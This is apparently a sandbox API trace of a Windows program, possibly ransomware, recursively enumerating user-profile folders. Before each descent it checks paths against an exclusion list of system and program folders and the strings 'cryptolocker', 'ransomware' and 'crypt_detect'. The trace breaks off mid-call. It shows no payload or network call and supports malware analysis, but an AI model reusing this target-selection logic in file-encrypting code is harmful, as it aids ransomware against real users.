lpFindFileData=0x552f6f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0072.104] StrCmpW (psz1="Templates", psz2=".") returned 1 [0072.104] StrCmpW (psz1="Templates", psz2="..") returned 1 [0072.104] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbc16a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0072.104] StrCmpW (psz1="Videos", psz2=".") returned 1 [0072.104] StrCmpW (psz1="Videos", psz2="..") returned 1 [0072.104] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0072.104] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0072.104] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Videos", cchMax=1058 | out: psz1="C:\\Users\\Default\\Videos") returned="C:\\Users\\Default\\Videos" [0072.104] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\windows\\system32\\") returned 0x0 [0072.104] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.104] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\windows\\system\\") returned 0x0 [0072.104] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.104] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.104] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\appdata\\local\\") returned 0x0 [0072.104] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.105] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.105] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.105] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\boot\\") returned 0x0 [0072.105] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\perflogs\\") returned 0x0 [0072.105] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\programdata\\") returned 0x0 [0072.105] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\drivers\\") returned 0x0 [0072.105] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\wsus\\") returned 0x0 [0072.105] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\efstmpwp\\") returned 0x0 [0072.105] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\$recycle.bin\\") returned 0x0 [0072.105] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="crypt_detect") returned 0x0 [0072.105] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="cryptolocker") returned 0x0 [0072.105] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="ransomware") returned 0x0 [0072.105] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="C:\\WINDOWS") returned 0x0 [0072.105] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="C:\\Program Files (x86)") returned 0x0 [0072.105] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="C:\\Program Files") returned 0x0 [0072.105] GetProcessHeap () returned 0xe30000 [0072.105] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b0) returned 0xece048 [0072.105] StrCpyNW (in: psz1=0xece048, psz2="C:\\Users\\Default\\Videos", cchMax=1072 | out: psz1="C:\\Users\\Default\\Videos") returned="C:\\Users\\Default\\Videos" [0072.105] StrNCatW (in: psz1="C:\\Users\\Default\\Videos", psz2="\\*", cchMax=1072 | out: psz1="C:\\Users\\Default\\Videos\\*") returned="C:\\Users\\Default\\Videos\\*" [0072.105] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Videos\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbc16a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec24b0 [0072.105] StrCmpW (psz1=".", psz2=".") returned 0 [0072.105] FindNextFileW (in: hFindFile=0xec24b0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbc16a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.105] StrCmpW (psz1="..", psz2=".") returned 1 [0072.105] StrCmpW (psz1="..", psz2="..") returned 0 [0072.105] FindNextFileW (in: hFindFile=0xec24b0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbc16a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0072.105] FindClose (in: hFindFile=0xec24b0 | out: hFindFile=0xec24b0) returned 1 [0072.106] GetProcessHeap () returned 0xe30000 [0072.106] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xece048 | out: hHeap=0xe30000) returned 1 [0072.106] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbc16a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0072.106] FindClose (in: hFindFile=0xec25f0 | out: hFindFile=0xec25f0) returned 1 [0072.106] GetProcessHeap () returned 0xe30000 [0072.106] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec7e68 | out: hHeap=0xe30000) returned 1 [0072.106] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd7b844b1, ftCreationTime.dwHighDateTime=0x1d2a02f, ftLastAccessTime.dwLowDateTime=0xd7b844b1, ftLastAccessTime.dwHighDateTime=0x1d2a02f, ftLastWriteTime.dwLowDateTime=0xd7b844b1, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0072.106] StrCmpW (psz1="Default User", psz2=".") returned 1 [0072.106] StrCmpW (psz1="Default User", psz2="..") returned 1 [0072.106] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc40864ff, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x7205420a, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default.migrated", cAlternateFileName="DEFAUL~1.MIG")) returned 1 [0072.106] StrCmpW (psz1="Default.migrated", psz2=".") returned 1 [0072.106] StrCmpW (psz1="Default.migrated", psz2="..") returned 1 [0072.106] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Users", cchMax=1042 | out: psz1="C:\\Users") returned="C:\\Users" [0072.106] StrNCatW (in: psz1="C:\\Users", psz2="\\", cchMax=1042 | out: psz1="C:\\Users\\") returned="C:\\Users\\" [0072.106] StrNCatW (in: psz1="C:\\Users\\", psz2="Default.migrated", cchMax=1042 | out: psz1="C:\\Users\\Default.migrated") returned="C:\\Users\\Default.migrated" [0072.106] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\windows\\system32\\") returned 0x0 [0072.106] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.106] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\windows\\system\\") returned 0x0 [0072.106] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.106] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.106] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\appdata\\local\\") returned 0x0 [0072.106] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.106] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.106] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.106] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\boot\\") returned 0x0 [0072.107] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\perflogs\\") returned 0x0 [0072.107] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\programdata\\") returned 0x0 [0072.107] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\drivers\\") returned 0x0 [0072.107] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\wsus\\") returned 0x0 [0072.107] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\efstmpwp\\") returned 0x0 [0072.107] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch=":\\$recycle.bin\\") returned 0x0 [0072.107] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="crypt_detect") returned 0x0 [0072.107] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="cryptolocker") returned 0x0 [0072.107] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="ransomware") returned 0x0 [0072.107] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="C:\\WINDOWS") returned 0x0 [0072.107] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="C:\\Program Files (x86)") returned 0x0 [0072.107] StrStrIW (lpFirst="C:\\Users\\Default.migrated", lpSrch="C:\\Program Files") returned 0x0 [0072.107] GetProcessHeap () returned 0xe30000 [0072.107] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xec7e68 [0072.107] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\Default.migrated", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated") returned="C:\\Users\\Default.migrated" [0072.107] StrNCatW (in: psz1="C:\\Users\\Default.migrated", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated\\*") returned="C:\\Users\\Default.migrated\\*" [0072.107] FindFirstFileW (in: lpFileName="C:\\Users\\Default.migrated\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc40864ff, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x7205420a, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2730 [0072.112] StrCmpW (psz1=".", psz2=".") returned 0 [0072.112] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc40864ff, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x7205420a, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.112] StrCmpW (psz1="..", psz2=".") returned 1 [0072.112] StrCmpW (psz1="..", psz2="..") returned 0 [0072.112] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7205420a, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7205420a, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0072.112] StrCmpW (psz1="AppData", psz2=".") returned 1 [0072.112] StrCmpW (psz1="AppData", psz2="..") returned 1 [0072.112] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\Default.migrated", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated") returned="C:\\Users\\Default.migrated" [0072.112] StrNCatW (in: psz1="C:\\Users\\Default.migrated", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated\\") returned="C:\\Users\\Default.migrated\\" [0072.112] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\", psz2="AppData", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated\\AppData") returned="C:\\Users\\Default.migrated\\AppData" [0072.112] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\windows\\system32\\") returned 0x0 [0072.112] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.112] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\windows\\system\\") returned 0x0 [0072.112] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.112] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.113] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\appdata\\local\\") returned 0x0 [0072.113] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.113] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.113] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.113] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\boot\\") returned 0x0 [0072.113] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\perflogs\\") returned 0x0 [0072.113] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\programdata\\") returned 0x0 [0072.113] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\drivers\\") returned 0x0 [0072.113] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\wsus\\") returned 0x0 [0072.113] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\efstmpwp\\") returned 0x0 [0072.113] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\$recycle.bin\\") returned 0x0 [0072.113] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="crypt_detect") returned 0x0 [0072.113] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="cryptolocker") returned 0x0 [0072.113] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="ransomware") returned 0x0 [0072.113] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="C:\\WINDOWS") returned 0x0 [0072.113] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="C:\\Program Files (x86)") returned 0x0 [0072.113] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="C:\\Program Files") returned 0x0 [0072.113] GetProcessHeap () returned 0xe30000 [0072.113] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c4) returned 0xece048 [0072.113] StrCpyNW (in: psz1=0xece048, psz2="C:\\Users\\Default.migrated\\AppData", cchMax=1092 | out: psz1="C:\\Users\\Default.migrated\\AppData") returned="C:\\Users\\Default.migrated\\AppData" [0072.113] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\AppData", psz2="\\*", cchMax=1092 | out: psz1="C:\\Users\\Default.migrated\\AppData\\*") returned="C:\\Users\\Default.migrated\\AppData\\*" [0072.113] FindFirstFileW (in: lpFileName="C:\\Users\\Default.migrated\\AppData\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7205420a, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7205420a, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2630 [0072.114] StrCmpW (psz1=".", psz2=".") returned 0 [0072.114] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7205420a, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7205420a, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.114] StrCmpW (psz1="..", psz2=".") returned 1 [0072.114] StrCmpW (psz1="..", psz2="..") returned 0 [0072.114] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7202dfa5, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7202dfa5, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0072.114] StrCmpW (psz1="Local", psz2=".") returned 1 [0072.114] StrCmpW (psz1="Local", psz2="..") returned 1 [0072.114] StrCpyNW (in: psz1=0xece048, psz2="C:\\Users\\Default.migrated\\AppData", cchMax=1092 | out: psz1="C:\\Users\\Default.migrated\\AppData") returned="C:\\Users\\Default.migrated\\AppData" [0072.114] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\AppData", psz2="\\", cchMax=1092 | out: psz1="C:\\Users\\Default.migrated\\AppData\\") returned="C:\\Users\\Default.migrated\\AppData\\" [0072.114] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\AppData\\", psz2="Local", cchMax=1092 | out: psz1="C:\\Users\\Default.migrated\\AppData\\Local") returned="C:\\Users\\Default.migrated\\AppData\\Local" [0072.114] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\windows\\system32\\") returned 0x0 [0072.114] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.114] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\windows\\system\\") returned 0x0 [0072.114] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.114] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.114] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\appdata\\local\\") returned 0x0 [0072.114] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.114] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.114] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.114] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\boot\\") returned 0x0 [0072.114] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\perflogs\\") returned 0x0 [0072.114] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\programdata\\") returned 0x0 [0072.114] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\drivers\\") returned 0x0 [0072.114] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\wsus\\") returned 0x0 [0072.114] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\efstmpwp\\") returned 0x0 [0072.114] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\$recycle.bin\\") returned 0x0 [0072.115] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="crypt_detect") returned 0x0 [0072.115] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="cryptolocker") returned 0x0 [0072.115] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="ransomware") returned 0x0 [0072.115] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="C:\\WINDOWS") returned 0x0 [0072.115] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="C:\\Program Files (x86)") returned 0x0 [0072.115] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="C:\\Program Files") returned 0x0 [0072.115] GetProcessHeap () returned 0xe30000 [0072.115] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d0) returned 0xecf520 [0072.115] StrCpyNW (in: psz1=0xecf520, psz2="C:\\Users\\Default.migrated\\AppData\\Local", cchMax=1104 | out: psz1="C:\\Users\\Default.migrated\\AppData\\Local") returned="C:\\Users\\Default.migrated\\AppData\\Local" [0072.115] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\AppData\\Local", psz2="\\*", cchMax=1104 | out: psz1="C:\\Users\\Default.migrated\\AppData\\Local\\*") returned="C:\\Users\\Default.migrated\\AppData\\Local\\*" [0072.115] FindFirstFileW (in: lpFileName="C:\\Users\\Default.migrated\\AppData\\Local\\*", lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7202dfa5, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7202dfa5, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec25b0 [0072.115] StrCmpW (psz1=".", psz2=".") returned 0 [0072.115] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7202dfa5, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7202dfa5, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.115] StrCmpW (psz1="..", psz2=".") returned 1 [0072.115] StrCmpW (psz1="..", psz2="..") returned 0 [0072.115] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7202dfa5, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7202dfa5, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0072.115] StrCmpW (psz1="Microsoft", psz2=".") returned 1 [0072.115] StrCmpW (psz1="Microsoft", psz2="..") returned 1 [0072.115] StrCpyNW (in: psz1=0xecf520, psz2="C:\\Users\\Default.migrated\\AppData\\Local", cchMax=1104 | out: psz1="C:\\Users\\Default.migrated\\AppData\\Local") returned="C:\\Users\\Default.migrated\\AppData\\Local" [0072.115] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\AppData\\Local", psz2="\\", cchMax=1104 | out: psz1="C:\\Users\\Default.migrated\\AppData\\Local\\") returned="C:\\Users\\Default.migrated\\AppData\\Local\\" [0072.115] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\AppData\\Local\\", psz2="Microsoft", cchMax=1104 | out: psz1="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft") returned="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft" [0072.115] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft", lpSrch="\\windows\\system32\\") returned 0x0 [0072.115] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.115] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft", lpSrch="\\windows\\system\\") returned 0x0 [0072.116] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.116] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.116] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Microsoft" [0072.116] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f198 | out: 